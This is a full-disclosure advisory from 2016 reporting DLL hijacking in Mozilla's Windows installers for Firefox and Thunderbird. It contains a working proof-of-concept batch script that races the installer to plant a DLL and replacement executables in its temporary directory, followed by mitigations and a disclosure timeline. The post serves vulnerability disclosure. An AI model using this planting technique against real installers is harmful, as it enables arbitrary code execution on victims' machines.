Mozilla Firefox DLL Hijacking
Posted on 15 June 2016
Hi @ll, <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should have fixed CVE-2014-1520 in Mozilla's executable installers for Windows ... but does NOT! JFTR: this type of vulnerability (really: a bloody stupid trivial beginner's error!) is well-known and well-documented as <https://cwe.mitre.org/data/definitions/379.html>. Proof of concept/demonstration: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe", "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe" and save them in an arbitrary directory; 1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL> plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and save them in an(other) arbitrary directory; 2. start your editor, copy and paste the following 10 lines and save them as "POC.CMD" in the same directory as "SHFOLDER.DLL" and "SENTINEL.EXE" downloaded in step 1: :WAIT1 @If Not Exist "%TEMP%7z*.tmp" Goto :WAIT1 For /D %%! In ("%TEMP%7z*.tmp") Do Set foobar=%%! Copy "%~dp0shfolder.dll" "%foobar%shfolder.dll" :WAIT2 @If Not Exist "%foobar%coremaintenanceservice.exe" Goto :WAIT2 Copy "%~dp0sentinel.exe" "%foobar%coremaintenanceservice.exe" :WAIT3 @If Not Exist "%foobar%coremaintenanceservice_installer.exe" Goto :WAIT3 Copy "%~dp0sentinel.exe" "%foobar%coremaintenanceservice_installer.exe" 3. execute the batch script "POC.CMD" created in step 2; 4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe", "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe" downloaded in step 0. and proceed as directed: notice the message boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE" placed by the batch script started in step 3 in the unsafe TEMP subdirectory created by Mozilla's vulnerable executable installers! PWNED! Mitigation(s): ~~~~~~~~~~~~~~ 0. don't use executable installers. DUMP THEM, NOW! 1. see <http://home.arcor.de/skanthak/!execute.html> as well as <http://home.arcor.de/skanthak/SAFER.html>. 2. stay away from Mozilla's vulnerable installers for their Windows software (at least until Mozilla starts to develop a sense for the safety and security of their users). stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199> not even an attempt to fix this vulnerability (check but <https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>) 2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269113> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269122> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269123> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269142> <https://bugzilla.mozilla.org/show_bug.cgi?id=1269144> not even an attempt to fix this vulnerability (check but <https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>) 2016-06-15 deadline expired after 45 days, report published
